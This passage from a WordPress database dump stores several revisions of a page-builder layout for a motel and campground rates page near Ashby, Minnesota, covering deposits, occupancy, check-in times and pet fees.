Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:1;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:897:\"<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.<br />\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.<br />\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM<br />\nWe believe that Pets are part of the family so pets on a leash are welcome in all campsites a day and some of the units PETS $8.00 per day<br />\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1544645389395\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:3;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(2434,819,'_wp_page_template','default'),(2435,819,'_elementor_edit_mode','builder'),(2436,819,'_elementor_template_type','post'),(2437,819,'_elementor_data','[{\"id\":\"74711f2d\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9f9cdef\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3281785\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"30a19b3\"}]},\"elements\":[{\"id\":\"5f29bf84\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7f1543f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"66ca0a5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8669d73\"}]},\"elements\":[{\"id\":\"3f6cc34d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pl-43\\\" class=\\\"panel-layout\\\"><div id=\\\"pg-43-0\\\" class=\\\"panel-grid panel-no-style\\\" data-style=\\\"{\\\" data-ratio=\\\"1\\\" data-ratio-direction=\\\"right\\\"><div id=\\\"pgc-43-0-0\\\" class=\\\"panel-grid-cell\\\" data-weight=\\\"1\\\"><div id=\\\"panel-43-0-0-0\\\" class=\\\"so-panel widget widget_sow-editor panel-first-child\\\" data-index=\\\"0\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\">Call us at 218-747-2959 for reservations\\u2028<p>\\u00a0<\\/p><p>A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.<br \\/>ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW<\\/p><p>Wireless Internet Available<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"1\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p>[table id=1 \\/]<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-2\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"2\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p>Suite #9 \\u2013 Cabins #13 &amp; #14 are no smoking and no pets<br \\/>Prices shown are for groups of 4 or less.\\u2028 All Daytime (Not Overnight) Guests $5.00 each \\u2028Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br \\/>All RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\\u2028PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\\u2028\\u00a0<\\/p><p>CHECK IN TIME IS AFTER 3:00 PM\\u2028 NO EXCEPTIONS\\u2028. CHECK OUT TIME IS BEFORE 10:00 AM (Late checkouts will be charged if not prearranged)\\u00a0\\u00a0<br \\/>We believe that Pets are part of the family so pets on a leash are welcome in all campsites ( 1 pet per campsite)\\u00a0 and some of the units ( 1 pet per unit where allowable). \\u2028PETS $8.00 per day<br \\/>Please do not bring firewood, if you live more than 50 miles from Ashby!<br \\/>MOTEL OPEN YEAR ROUND.\\u2028 CALL FOR WINTER RATES<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-3\\\" class=\\\"so-panel widget widget_sow-editor panel-last-child\\\" data-index=\\\"3\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\">[table id=2 \\/]<\\/div><\\/div><\\/div><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2438,819,'_elementor_version','2.5.15'),(2441,820,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:1;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:897:\"<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.<br />\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.<br />\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM<br />\nWe believe that Pets are part of the family so pets on a leash are welcome in all campsites a day and some of the units PETS $8.00 per day<br />\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1544645389395\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:3;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(2442,820,'_wp_page_template','default'),(2443,820,'_elementor_edit_mode','builder'),(2444,820,'_elementor_template_type','post'),(2445,820,'_elementor_data','[{\"id\":\"74711f2d\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9f9cdef\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3281785\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"30a19b3\"}]},\"elements\":[{\"id\":\"5f29bf84\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7f1543f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"66ca0a5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8669d73\"}]},\"elements\":[{\"id\":\"3f6cc34d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pl-43\\\" class=\\\"panel-layout\\\"><div id=\\\"pg-43-0\\\" class=\\\"panel-grid panel-no-style\\\" data-style=\\\"{\\\" data-ratio=\\\"1\\\" data-ratio-direction=\\\"right\\\"><div id=\\\"pgc-43-0-0\\\" class=\\\"panel-grid-cell\\\" data-weight=\\\"1\\\"><div id=\\\"panel-43-0-0-0\\\" class=\\\"so-panel widget widget_sow-editor panel-first-child\\\" data-index=\\\"0\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\">Call us at 218-747-2959 for reservations\\u2028<p>A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.<br \\/>ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW<\\/p><p>Wireless Internet Available<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"1\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p>[table id=1 \\/]<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-2\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"2\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p>Suite #9 \\u2013 Cabins #13 &amp; #14 are no smoking and no pets<br \\/>Prices shown are for groups of 4 or less.\\u2028 All Daytime (Not Overnight) Guests $5.00 each \\u2028Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br \\/>All RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\\u2028PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\\u2028\\u00a0<\\/p><p>CHECK IN TIME IS AFTER 3:00 PM\\u2028 NO EXCEPTIONS\\u2028. CHECK OUT TIME IS BEFORE 10:00 AM (Late checkouts will be charged if not prearranged)\\u00a0\\u00a0<br \\/>We believe that Pets are part of the family so pets on a leash are welcome in all campsites ( 1 pet per campsite)\\u00a0 and some of the units ( 1 pet per unit where allowable). \\u2028PETS $8.00 per day<br \\/>Please do not bring firewood, if you live more than 50 miles from Ashby!<br \\/>MOTEL OPEN YEAR ROUND.\\u2028 CALL FOR WINTER RATES<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-3\\\" class=\\\"so-panel widget widget_sow-editor panel-last-child\\\" data-index=\\\"3\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\">[table id=2 \\/]<\\/div><\\/div><\\/div><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2446,820,'_elementor_version','2.5.15'),(2449,821,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:1;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:897:\"<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.<br />\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.<br />\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM<br />\nWe believe that Pets are part of the family so pets on a leash are welcome in all campsites a day and some of the units PETS $8.00 per day<br />\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1544645389395\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:3;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(2450,821,'_wp_page_template','default'),(2451,821,'_elementor_edit_mode','builder'),(2452,821,'_elementor_template_type','post'),(2453,821,'_elementor_data','[{\"id\":\"74711f2d\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9f9cdef\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3281785\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"30a19b3\"}]},\"elements\":[{\"id\":\"5f29bf84\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7f1543f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"66ca0a5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8669d73\"}]},\"elements\":[{\"id\":\"3f6cc34d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pl-43\\\" class=\\\"panel-layout\\\"><div id=\\\"pg-43-0\\\" class=\\\"panel-grid panel-no-style\\\" data-style=\\\"{\\\" data-ratio=\\\"1\\\" data-ratio-direction=\\\"right\\\"><div id=\\\"pgc-43-0-0\\\" class=\\\"panel-grid-cell\\\" data-weight=\\\"1\\\"><div id=\\\"panel-43-0-0-0\\\" class=\\\"so-panel widget widget_sow-editor panel-first-child\\\" data-index=\\\"0\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\">Call us at 218-747-2959 for reservations\\u2028<p>A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.<br \\/>ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW<\\/p><p>Wireless Internet Available<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"1\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p>[table id=1 \\/]<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-2\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"2\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p>Suite #9 \\u2013 Cabins #13 &amp; #14 are no smoking and no pets<br \\/>Prices shown are for groups of 4 or less.\\u2028 All Daytime (Not Overnight) Guests $5.00 each \\u2028Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br \\/>All RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\\u2028PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\\u2028\\u00a0<\\/p><p><strong>CHECK IN TIME IS AFTER 3:00 PM\\u2028 NO EXCEPTIONS\\u2028. CHECK OUT TIME IS BEFORE 10:00 AM (Late checkouts will be charged if not prearranged)\\u00a0<\\/strong>\\u00a0<br \\/>We believe that Pets are part of the family so pets on a leash are welcome in all campsites ( 1 pet per campsite)\\u00a0 and some of the units ( 1 pet per unit where allowable). \\u2028PETS $8.00 per day<br \\/>Please do not bring firewood, if you live more than 50 miles from Ashby!<br \\/>MOTEL OPEN YEAR ROUND.\\u2028 CALL FOR WINTER RATES<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-3\\\" class=\\\"so-panel widget widget_sow-editor panel-last-child\\\" data-index=\\\"3\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\">[table id=2 \\/]<\\/div><\\/div><\\/div><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2454,821,'_elementor_version','2.5.15'),(2481,826,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:2:\"id\";s:18:\"sow-editor-4310000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-82610000\";}i:1;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-82610001\";}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:929:\"<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.<br />\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.<br />\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME 